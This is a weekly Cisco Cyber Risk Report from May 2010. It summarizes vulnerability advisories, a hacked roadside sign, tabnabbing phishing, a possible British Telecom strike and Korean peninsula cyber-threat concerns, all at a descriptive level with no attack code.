Cyber Risk Report

May 24–30, 2010

The Cyber Risk Report is a strategic intelligence product that highlights current security activity and mid- to long-range perspectives. The report addresses seven major risk management categories: vulnerability, physical, legal, trust, identity, human, and geopolitical. Cyber Risk Reports are powered by Cisco Security Intelligence Operations, an advanced security infrastructure that identifies, analyzes, and defends against threats to keep organizations informed and protected. Cyber Risk Reports are the collaborative efforts of Cisco security analysts from the following teams: IntelliShield, Applied Intelligence, Remote Management Services, Intrusion Prevention System Signature Development, Cisco Product Security Incident Response, Cisco Malware Research, Strategic Technology Assessment Team, Infrastructure Security Research & Development, IronPort Email and Web Threat Research, Critical Infrastructure Assurance Group, Advanced Services, Security Sales and Engineering, Corporate Security Programs, Government Affairs, and Legal Support.

Vulnerability

Although vulnerability and threat activity during this period was consistent with previous weeks, several major vendors released security advisories and updates, including Cisco, IBM, HP, Adobe, VMware, FreeBSD, and Oracle. Spam activity identified by Cisco Security Intelligence Operations also continues to remain at elevated levels.

Cisco released a security advisory to address multiple vulnerabilities in the Network Building Mediator Framework. The Cisco Network Building Mediator collects data from a variety of sources, including building, IT, energy supply, and energy demand systems and normalizes the data into a common representation. The vulnerabilities include default credentials, privilege escalation, unauthorized information interception, and unauthorized information access. Additional information is available on the Cisco Security Intelligence Operations portal.

A cross-site scripting vulnerability was recently identified in Microsoft Outlook Web Access. Exploitation of this vulnerability could allow an unauthenticated, remote attacker to execute arbitrary HTML or script code in a user's browser. Proof-of-concept code is publicly available, and additional information on the vulnerability is available in IntelliShield Alert 20553.

During the time period, VMware released Security Advisory VMSA-2010-0009 to address a total of 43 vulnerabilities in ESXi utilities and third-party updates for ESX Service Console.

Multiple sources have identified criminal activity surrounding the upcoming FIFA World Cup, which will occur in South Africa from June 11–July 11, 2010. Due to the global popularity of this event, criminals may engage in ticket scams, malicious e-mail messages, spam with embedded hyperlinks to malicious websites, infected legitimate websites, and postings to social networking services. Users who access online information about the matches could expose themselves and even business environments to malicious activity. Increased user awareness and caution, enabling available browser and e-mail security features, and increased filtering and blocking at the network level can mitigate many of these threats.

IntelliShield published 85 events last week: 34 new events and 51 updated events. Of the 85 events, 69 were Vulnerability Alerts, one was a Security Activity Bulletin, two were Security Issue Alerts, 11 were Threat Outbreak Alerts, one was an Applied Mitigation Bulletin, and one was a Cyber Risk Report. The alert publication totals are as follows:

Weekly Alert Totals

Day Date New Updated Total
Friday 05/28/2010 5 18 23
Thursday 05/27/2010 6 4 10
Wednesday 05/26/2010 14 15 29
Tuesday 05/25/2010 5 2 7
Monday 05/24/2010 4 12 16
Weekly Total 34 51 85


Previous Alerts That Still Represent Significant Risk

Oracle Java Web Start Java Development Kit ActiveX Control Command-Line Injection Vulnerability
IntelliShield Vulnerability Alert 20314, Version 4, May 19, 2010
Urgency/Credibility/Severity Rating: 3/5/4

Oracle Java contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands on the system with the privileges of the user. Systems with Oracle Java JRE and JDK 6 Update 10 and later contain the affected ActiveX control and are vulnerable. Apple has released security updates for Java for Mac OS X 10.6 Update 2 and Java for Mac OS X 10.5. Multiple vendor updates are available.

Kernel Hook Bypassing Engine Affects Multiple Security Applications
IntelliShield Vulnerability Alert 20433, Version 2, May 13, 2010
Urgency/Credibility/Severity Rating: 2/4/4

A security research team has created a tool that is able to bypass security software protections provided by host-based security software on Microsoft Windows systems and execute arbitrary code with kernel privileges.

DNSSEC-Enabled Queries to the DURZ Serving Root May Affect DNS Services
IntelliShield Vulnerability Alert 20418, Version 1, May 3, 2010
Urgency/Credibility/Severity Rating: 2/5/3

DNSSEC-enabled queries to the root servers may be affected because the last (J-root) of the 13 root servers will begin serving the DURZ on May 5, 2010.

Microsoft SharePoint Server 2007 Cross-Site Scripting Vulnerability
IntelliShield Vulnerability Alert 20415, Version 2, April 30, 2010
Urgency/Credibility/Severity Rating: 2/5/3

Microsoft SharePoint Server 2007 versions SP2 and prior contain a cross-site scripting vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary HTML or script code in a user's browser. Proof-of-concept code that exploits this vulnerability is publicly available. Microsoft has confirmed this vulnerability, but software updates are not available.

McAfee VirusScan DAT Update May Cause Microsoft Windows System Failure
IntelliShield Vulnerability Alert 20375, Version 2, April 22, 2010
Urgency/Credibility/Severity Rating: 4/5/3

A McAfee DAT file that was distributed to VirusScan applications has caused errors on certain Microsoft Windows XP-based systems. As a result of installing the 5958 DAT file and rebooting, systems may be rendered unusable. McAfee has released a knowledgebase article with various workarounds.

Transport Layer Security Renegotiation Remote Man-in-the-Middle Attack Vulnerability
IntelliShield Vulnerability Alert 19361, Version 54, May 26, 2010
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2009-3555

Multiple Transport Layer Security (TLS) implementations contain a vulnerability when renegotiating a TLS session that could allow an unauthenticated, remote attacker to conduct a man-in-the-middle attack. Proof-of-concept code that exploits this vulnerability is publicly available. Mozilla and Oracle, in addition to other vendors, have released updates for this vulnerability.

Microsoft Internet Explorer Invalid Pointer Reference Access Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 20052, Version 4, March 30, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-0806

Microsoft has re-released a security advisory and updated software to address the Microsoft Internet Explorer invalid pointer reference access arbitrary code execution vulnerability. Functional exploit code is being used in ongoing exploits, and Microsoft has released a security bulletin and updated software.

Mozilla Firefox WOFF Decoder Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 19968, Version 2, March 23, 2010
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2010-1028

Mozilla Firefox contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code. Mozilla has confirmed this vulnerability and has released updated software.

Microsoft VBScript Unsafe Help File Handling Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 20014, Version 3, April 13, 2010
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2010-0483

Microsoft has released a security advisory with information about affected products to address the Microsoft Internet Explorer unsafe help file handling arbitrary code execution vulnerability. Proof-of-concept code that demonstrates code execution is available.

Physical

Digital Signage Threats

In the United States, a movable roadside sign was hacked last week in the state of Florida. The sign was changed from a message that advised drivers of an upcoming exit closure to an ethnically offensive comment. Investigators have not identified the perpetrators and are still unsure how the the attack occurred. Because traffic department technicians were not able to remove the message, the sign was eventually disabled.
Read More
Additional Information

IntelliShield Analysis: Digital signage is ubiquitous, and many individuals have come to rely on it for a variety of uses, from dangerous road condition warnings, traffic flow control, or airport directions. Although physical security on a device like a mobile road side sign is problematic, passwords are frequently left at the default. Many systems are left unlocked, and many have well-known passwords and password recovery routines. The message on the Florida was offensive, but the potential for real harm exists. These signs are intended to warn drivers of potentially hazardous roadway situations; instead, they could have provided false information or directed motorists towards accidents in certain traffic lanes. Administrators of these devices are advised to change passwords from their defaults and, where possible, physically secure these devices.

Legal

Potential British Telecom Strike Could Have Widespread Impact

The threat of a British Telecom (BT) strike could affect Internet and phone connections for thousands of customers. The Communications Workers Union (CWU) announced that up to 60,000 BT workers, many of them engineers, could go on strike unless their salaries are increased by 2 percent. The strike threat follows reports of recent executive bonuses; the CWU feels that all BT workers should receive a share of the company's bonus compensation packages. Read More

IntelliShield Analysis: Contentious labor relations are not new; however, the fact that British Telecom provides voice and data services to so many customers makes the threat of a strike more daunting. The last BT strike was 23 years ago and predated the ubiquitous use of the Internet. The overall impact of both a voice and Internet outage could be severe and affect how customers and organizations communicate and, more importantly, perform business transactions on a daily basis.

Trust

New Attack Brings Phishing to Browser Tabs

The creative lead for the Mozilla Firefox browser recently described a new attack against web browsers. By monitoring when a user stops viewing a particular browser tab, malicious script could reload the page and make it appear as the login prompt for a website, such as a bank or other landing page. The attack, which could allow phishing in a user's browser, bypasses many common antiphishing awareness techniques. Read More

IntelliShield Analysis: This attack relies upon the trust that users often place in pages that are already open or frequently left open, like webmail accounts. The attack, which is being referred to as "tabnabbing," leverages the trust that users place in favicons and tab titles. The attack can be very convincing when attackers combine it with efforts to detect which sites a user has authenticated to. As web browsing and persistent web application use has pervaded the daily activities of users, efforts that subvert a user's interface and experience may eclipse many reliable antiphishing recommendations. Browsers and security add-ons will adapt to these new techniques; in the interim, users are advised to close and reopen common pages when their sessions expire.

Identity

There was no significant activity in this category during the time period.

Human

There was no significant activity in this category during the time period.

Geopolitical

Korean Peninsula Tensions Heighten Cyber Threat

Tensions on the Korean peninsula are high following a report issued by an international team that blames North Korea for the sinking of a South Korean warship and the deaths of 46 sailors. North Korea denied the charges and severed ties with South Korea, reducing the operations of an industrial complex that employed thousands of North Koreans on manufacturing contracts for South Korean firms. The United States is working to obtain China's support for tougher United Nations Security Council sanctions by offering additional evidence, if requested, of North Korea's culpability. Meanwhile, Chinese Premier Wen Jiabao recently visited South Korea and stressed the need to handle the issue with care and avoid escalation of the situation.
Read More
Additional Information
Additional Information

IntelliShield Analysis: Although the probability of full-scale military engagement remains low, an exchange of hostile actions could affect the information technology industry. Renewed missile tests, naval confrontations, and cross-border shelling are not unlikely, but retaliation could also include cyber attacks against South Korean military or critical infrastructure, or other critical networks that belong to South Korean allies, particularly the United States. As recently as last summer, attacks against government and military websites in South Korea and the United States were unofficially blamed on North Korea. During past confrontations, outside observers have claimed that North Korea behaved in ways that appear irrational and belligerent. Reports that North Korea's ailing leader recently selected his preferred successor (a son who is young and inexperienced) seem to increase the risk of power plays in the military inner circle. Information security specialists are advised to be on alert until tensions related to this situation ease.

Upcoming Security Activity

Gartner Security & Risk Management Summit: June 21–23, 2010
Cisco Live 2010 (Las Vegas, United States): June 27–July 1, 2010
Black Hat USA (Las Vegas, United States): July 24–29, 2010
DEFCON 18 (Las Vegas, United States): July 29–August 1, 2010
BSides Las Vegas: July 28–29, 2010

Because of the potential for increased risk on multiple vectors, organizations' security teams should be aware of and consider making special preparations for the following dates:

World Expo (Shanghai, China): May 1–October 31, 2010
FIFA World Cup (South Africa): June 11–July 11, 2010
Poland Elections: June 20, 2010
G20 Summit (Toronto, Canada): June 26–27, 2010

Additional Information

For more information about the vulnerabilities contained in this report or the Cisco Security IntelliShield Alert Manager Service, please visit
      Cisco Security IntelliShield Alert Manager Service

For information on obtaining a free trial of the Cisco Security IntelliShield Alert Manager Service, please visit
      Trial Registration



This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.

Back to Top